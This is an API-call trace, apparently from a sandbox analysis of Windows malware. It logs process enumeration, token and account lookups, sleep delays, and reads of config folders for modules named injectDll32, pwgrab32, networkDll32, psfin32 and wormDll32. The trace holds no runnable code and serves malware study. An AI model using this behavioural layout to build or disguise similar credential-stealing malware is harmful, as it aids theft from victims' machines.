	[0245.780] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.781] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0245.781] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0245.781] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0245.781] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.782] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.782] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.783] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.783] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.784] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.784] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.785] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.785] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.786] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0245.786] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.787] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.787] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.788] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.788] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0245.789] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0245.789] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0245.789] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0245.789] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0245.790] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0245.790] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.791] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.791] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0245.792] CloseHandle (hObject=0x6f4) returned 1
	[0245.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1570
	[0245.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1798
	[0245.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311738
	[0245.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x6f4
	[0245.792] OpenProcessToken (in: ProcessHandle=0x6f4, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x634) returned 1
	[0245.792] GetTokenInformation (in: TokenHandle=0x634, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0245.792] GetLastError () returned 0x7a
	[0245.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a66f8
	[0245.792] GetTokenInformation (in: TokenHandle=0x634, TokenInformationClass=0x1, TokenInformation=0x22a66f8, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a66f8, ReturnLength=0x128c98) returned 1
	[0245.792] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6700*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0245.793] CloseHandle (hObject=0x634) returned 1
	[0245.793] CloseHandle (hObject=0x6f4) returned 1
	[0245.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778820
	[0245.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1570) returned 1
	[0245.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778848
	[0245.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1570
	[0245.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807048
	[0245.793] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0245.793] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0245.793] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0245.793] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0245.793] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0245.793] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0245.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807048) returned 1
	[0245.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1570) returned 1
	[0245.794] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1798) returned 1
	[0245.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0245.794] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.794] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0245.794] Sleep (dwMilliseconds=0x4e20) 
	[0245.795] Sleep (dwMilliseconds=0x4e20) 
	[0245.811] Sleep (dwMilliseconds=0x4e20) 
	[0245.827] Sleep (dwMilliseconds=0x4e20) 
	[0245.843] Sleep (dwMilliseconds=0x4e20) 
	[0245.858] Sleep (dwMilliseconds=0x4e20) 
	[0245.948] Sleep (dwMilliseconds=0x4e20) 
	[0245.983] Sleep (dwMilliseconds=0x4e20) 
	[0246.030] Sleep (dwMilliseconds=0x4e20) 
	[0246.044] Sleep (dwMilliseconds=0x4e20) 
	[0246.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.061] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.061] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.061] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.061] CloseHandle (hObject=0x688) returned 1
	[0246.061] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.061] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.062] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.062] CloseHandle (hObject=0x688) returned 1
	[0246.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.062] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.062] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.062] CloseHandle (hObject=0x688) returned 1
	[0246.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.063] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.063] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.063] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.063] CloseHandle (hObject=0x688) returned 1
	[0246.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.063] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.063] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.063] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.064] CloseHandle (hObject=0x688) returned 1
	[0246.064] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.064] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.064] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.064] GetFileTime (in: hFile=0x688, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.064] CloseHandle (hObject=0x688) returned 1
	[0246.064] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.064] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.064] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.064] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.064] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0246.065] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6fc0
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1708
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0246.065] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1708, Size=0x10) returned 0x27e14c8
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0246.065] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e14c8, Size=0x10) returned 0x27e1708
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0246.065] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1708, Size=0x10) returned 0x27e14c8
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0246.065] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e14c8, Size=0x20) returned 0x2778208
	[0246.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0246.065] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
